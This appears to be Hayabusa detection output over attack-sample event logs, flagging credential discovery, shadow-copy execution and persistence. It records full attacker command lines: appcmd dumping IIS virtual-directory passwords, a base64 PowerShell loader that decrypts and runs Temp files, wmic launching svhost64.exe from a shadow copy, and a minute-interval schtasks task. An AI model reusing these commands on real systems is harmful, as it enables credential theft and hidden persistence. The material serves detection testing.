C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.784 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.894 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.964 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.034 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.124 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir 
""Description: Cannot read configuration file due to insufficient permissions"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.204 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.305 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.435 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.555 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". 
)"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-28 00:12:38.241 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c whoami /groups : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /groups : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c whoami /groups ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:43.990 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off 
/node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:44.055 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get 
state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.763 
+09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin List Shadows : Path: C:\Windows\System32\vssadmin.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find ""Shadow Copy Volume"" : Path: C:\Windows\System32\find.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI 
Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: IEWIN7\IEUser : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 